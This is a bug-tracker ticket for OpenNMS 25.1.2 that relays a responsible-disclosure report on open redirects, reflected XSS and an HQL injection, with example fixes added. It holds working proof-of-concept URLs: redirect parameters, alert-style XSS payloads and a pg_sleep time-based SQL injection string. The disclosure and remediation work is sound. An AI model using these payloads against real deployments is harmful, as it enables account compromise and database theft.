Details
- Bug
- Status: Resolved
- Major
- Resolution: Fixed
- 25.1.2
- Security Level: Default (Default Security Scheme)
- Horizon 2020 - March 18th, Horizon 2020 - April 1st
Description
Multiple security issues reported via e-mail by Johannes Moritz (RIPS Technologies), who would like to be credited in release notes.
jmoritz and dbrinkrolf are the usernames for e-mail contact. Both are at ripstech.com.
Hi,
We found several security issues in OpenNMS with our static code analysis engine RIPS.
The severity of the found issues is from low to critical:
- 3 Open Redirect vulnerabilities (low)
- 9 Reflected Cross-Site Scripting issues (medium)
- 1 HQL Injection (critical)
We have verified the issues with OpenNMS 25.1.2 (openjdk version "11.0.5" and xubuntu 18.04).
You will find the details in the attached markdown file.
I would be happy if you could credit me in the release notes or in the CVE details with "Johannes Moritz (RIPS Technologies)".
If you have further questions, don't hesitate to contact my colleague (in CC).
Best regards,
Johannes Moritz
Referenced markdown file follows.
RIPS found 3 Open Redirect issues in the following files of OpenNMS 25.1.2:
- AcknowledgeAlarmController
  https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/java/org/opennms/web/controller/alarm/AcknowledgeAlarmController.java
- AcknowledgeNotificationController
  https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/java/org/opennms/web/controller/notification/AcknowledgeNotificationController.java
- AcknowledgeAlarmByFilterController
  https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/java/org/opennms/web/controller/alarm/AcknowledgeAlarmByFilterController.java
The first issue can be exploited via the GET parameter `redirect` by accessing the following URL:
`http://192.168.56.102:8980/opennms/alarm/acknowledge?redirect=http://google.com&actionCode=unack&alarm=1`
The second issue can be exploited via the GET parameter `redirect` by accessing the following URL:
`192.168.56.102:8980/opennms/notification/acknowledge?redirect=http://google.com&notices=1`
The third issue can be exploited via the GET parameter `redirect` by accessing the following URL:
`http://192.168.56.102:8980/opennms/alarm/acknowledgeByFilter?redirect=http://google.com&actionCode=unack`
For more information about fixing an OpenRedirect see:
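As an added example (not code from the RIPS report or from OpenNMS), this is the kind of check the three acknowledge controllers can apply to the `redirect` parameter before issuing the redirect: only an absolute path under the application's context path is accepted, everything else falls back to a fixed local page. The context path and the fallback target are assumed values.

```java
import java.net.URI;
import java.net.URISyntaxException;

// Added example, not OpenNMS code: only accept a `redirect` value that stays
// inside the application; anything else falls back to a fixed local page.
public final class SafeRedirect {

    private static final String CONTEXT_PATH = "/opennms";                  // assumed
    private static final String DEFAULT_TARGET = "/opennms/alarm/list.htm"; // assumed

    /** Returns `redirect` if it is a local path under CONTEXT_PATH, else DEFAULT_TARGET. */
    public static String resolve(String redirect) {
        if (redirect == null || redirect.isEmpty()) {
            return DEFAULT_TARGET;
        }
        // Control characters could split the Location header; refuse them outright.
        for (char c : redirect.toCharArray()) {
            if (c < 0x20 || c == 0x7f) {
                return DEFAULT_TARGET;
            }
        }
        // Browsers treat "\" like "/", so "/\evil" would be read as "//evil".
        if (redirect.indexOf('\\') >= 0) {
            return DEFAULT_TARGET;
        }
        // A safe target is an absolute path: it starts with exactly one "/".
        // This rules out "http://...", "javascript:", "//host" and "///host".
        if (!redirect.startsWith("/") || redirect.startsWith("//")) {
            return DEFAULT_TARGET;
        }
        String path;
        try {
            // normalize() collapses "/opennms/../other" to "/other" before the check.
            path = new URI(redirect).normalize().getRawPath();
        } catch (URISyntaxException e) {
            return DEFAULT_TARGET; // unparseable input: refuse rather than guess
        }
        if (path == null
                || !(path.equals(CONTEXT_PATH) || path.startsWith(CONTEXT_PATH + "/"))) {
            return DEFAULT_TARGET;
        }
        return redirect;
    }
}
```

With this in place, `redirect=http://google.com` from the three URLs above resolves to the fallback page, while `redirect=/opennms/alarm/detail.htm?id=1` is passed through unchanged.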
## Reflected Cross-Site Scripting
We found 9 reflected XSS issues in the following files of OpenNMS 25.1.2:
- load-assets.jsp:
  https://github.com/OpenNMS/opennms/blob/master/core/web-assets/src/main/assets/static/load-assets.jsp
- resultsIndexNoCount.jsp:
  https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/webapp/includes/resultsIndexNoCount.jsp
- resultsIndex.jsp:
  https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/webapp/includes/resultsIndex.jsp
- notification-box.jsp:
  https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/webapp/includes/notification-box.jsp
### 1. load-assets.jsp
There are 2 reflected XSS issues in the file `load-assets.jsp`.
Both issues can be triggered without authentication.
- The first issue can be exploited via the GET parameter `asset-async` by accessing the following URL:
`http://192.168.56.102:8980/opennms/assets/load-assets.jsp?asset-async=a%22%3Ealert(1)//&asset-media=b&asset-defer=true&asset=vaadin-theme&asset=print.js&asset-type=js`
- The second issue can be exploited via the GET parameter `asset-media` by accessing the following URL:
`http://192.168.56.102:8980/opennms/assets/load-assets.jsp?asset-async=&asset-media=b%22%3E%3Cscript%3Ealert(1)%3C/script%3E&asset-defer=true&asset=vaadin-theme&asset=print&asset-type=css`
### 2. resultsIndexNoCount.jsp
There are 3 XSS issues in the file `resultsIndexNoCount.jsp`. These issues require the victim to be authenticated.
- The first issue can be exploited via the GET parameter `multiplename` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndexNoCount.jsp?itemCount=10&baseurl=2%22&multiplename=test%22%3E%3Csvg/onload=alert(1)%3E&multiple=1`
- The second issue can be exploited via the GET parameter `limitname` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndexNoCount.jsp?itemCount=10&baseurl=2%22&limitname=test%22%3E%3Csvg/onload=alert(1)%3E&multiple=1`
- The third issue can be exploited via the GET parameter `baseurl` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndexNoCount.jsp?itemCount=10&baseurl=test%22%3E%3Csvg/onload=alert(1)%3E&multiple=1`
### 3. resultsIndex.jsp
There are 3 XSS issues in the file `resultsIndex.jsp`. These issues require the victim to be authenticated.
- The first issue can be exploited via the GET parameter `multiplename` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndex.jsp?count=10&baseurl=test&limit=9&multiplename=a%22%3E%3Csvg/onload=alert(1)%3E`
- The second issue can be exploited via the GET parameter `limitname` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndex.jsp?count=10&baseurl=test&limit=9&limitname=a%22%3E%3Csvg/onload=alert(1)%3E`
- The third issue can be exploited via the GET parameter `baseurl` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndex.jsp?count=10&baseurl=test%22%3E%3Csvg/onload=alert(1)%3E&limit=9`
### 4. notification-box.jsp
- There is 1 XSS issue in the file `notification-box.jsp`, which can be triggered via the GET parameter `node` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/notification-box.jsp?node=tset%22%3E%3Csvg/onload=alert(1)%3E`
Information about fixing XSS issues can be found here:
## HQL Injection
There is an HQL Injection in the NodeListController endpoint of OpenNMS. The HQL injection requires privileges of the role "ROLE_USER" (low privilege user).
The GET parameters `snmpParmValue` and `snmpParm` are concatenated into an HQL query in the function `org.opennms.web.svclayer.support.addCriteriaForSnmpParm`.
The concatenation of user input into a database query is insecure since malicious HQL commands can be injected and arbitrary data can be read from the database.
The following listing shows the vulnerable function.
```java
private static void addCriteriaForSnmpParm(OnmsCriteria criteria,
        String snmpParm, String snmpParmValue, String snmpParmMatchType) {
    criteria.createAlias("node.ipInterfaces", "ipInterface");
    criteria.add(Restrictions.ne("ipInterface.isManaged", "D"));
    criteria.createAlias("node.snmpInterfaces", "snmpInterface");
    criteria.add(Restrictions.ne("snmpInterface.collect", "D"));
    if (snmpParmMatchType.equals("contains")) {
        // body of the "contains" branch not included in the report
    } else if (snmpParmMatchType.equals("equals")) {
        snmpParmValue = snmpParmValue.toLowerCase();
        // snmpParm and snmpParmValue are concatenated straight into the SQL text;
        // {alias} is Hibernate's placeholder for the root entity's table alias
        criteria.add(Restrictions.sqlRestriction("{alias}.nodeid in (select nodeid from snmpinterface where snmpcollect != 'D' and lower(snmp" + snmpParm + ") = '" + snmpParmValue + "')"));
    }
}
```
When accessing the following URL we can execute the `PostgreSQL` function `pg_sleep`:
`http://192.168.56.102:8980/opennms/element/nodeList.htm?snmpParm=collect&snmpParmValue=ab%27+and+%24%24%3D%27%24%24%3Dchr(61)||chr(39)and(select+pg_sleep(6))%3A%3Atext%3Dchr(39))+--&snmpParmMatchType=equals&listInterfaces=true`
For more information see:
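A hardened rewrite of the function shown above, added here as an illustration and not OpenNMS's actual fix for NMS-12572: `snmpParm` lands in an identifier position (`lower(snmp<parm>)`), which a bind parameter cannot occupy, so it is checked against an allow-list, while `snmpParmValue` is handed to Hibernate's `Restrictions.sqlRestriction(String, Object, Type)` as a bound parameter instead of being spliced into the SQL text. The allow-list entries and the package of `OnmsCriteria` are assumptions; the "contains" branch is left out because the report does not show its body.

```java
import java.util.Set;
import org.hibernate.criterion.Restrictions;
import org.hibernate.type.StandardBasicTypes;
import org.opennms.netmgt.model.OnmsCriteria; // assumed package for the wrapper used in the report

// Added example, not OpenNMS's fix: same criteria as the vulnerable listing,
// with the column name allow-listed and the value sent as a bound parameter.
public final class SnmpParmCriteria {

    // snmpParm is spliced into an identifier position, which a JDBC bind
    // parameter cannot occupy, so an allow-list is the only safe option.
    // Entries are illustrative; a real list holds exactly the columns the UI offers.
    private static final Set<String> ALLOWED_SNMP_PARMS =
            Set.of("ifdescr", "ifname", "ifalias", "physaddr", "collect");

    static void addCriteriaForSnmpParm(OnmsCriteria criteria, String snmpParm,
                                       String snmpParmValue, String snmpParmMatchType) {
        if (snmpParm == null || !ALLOWED_SNMP_PARMS.contains(snmpParm)) {
            // Reject before any SQL is built; do not echo the value into the message.
            throw new IllegalArgumentException("unsupported snmpParm");
        }
        criteria.createAlias("node.ipInterfaces", "ipInterface");
        criteria.add(Restrictions.ne("ipInterface.isManaged", "D"));
        criteria.createAlias("node.snmpInterfaces", "snmpInterface");
        criteria.add(Restrictions.ne("snmpInterface.collect", "D"));
        // Only the "equals" branch is shown in the report, so only it is covered here.
        if ("equals".equals(snmpParmMatchType)) {
            // The value travels as a typed JDBC parameter (?): quotes, "--" or "$$"
            // inside it are ordinary characters of the compared string, not SQL.
            criteria.add(Restrictions.sqlRestriction(
                    "{alias}.nodeid in (select nodeid from snmpinterface "
                    + "where snmpcollect != 'D' and lower(snmp" + snmpParm + ") = ?)",
                    snmpParmValue == null ? "" : snmpParmValue.toLowerCase(),
                    StandardBasicTypes.STRING));
        }
    }
}
```

With this version the `pg_sleep` request above no longer reaches PostgreSQL as SQL: the whole `snmpParmValue` string is compared as a literal and simply matches nothing.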
Issue Links
- depends on: NMS-12572 HQL Injection (Resolved)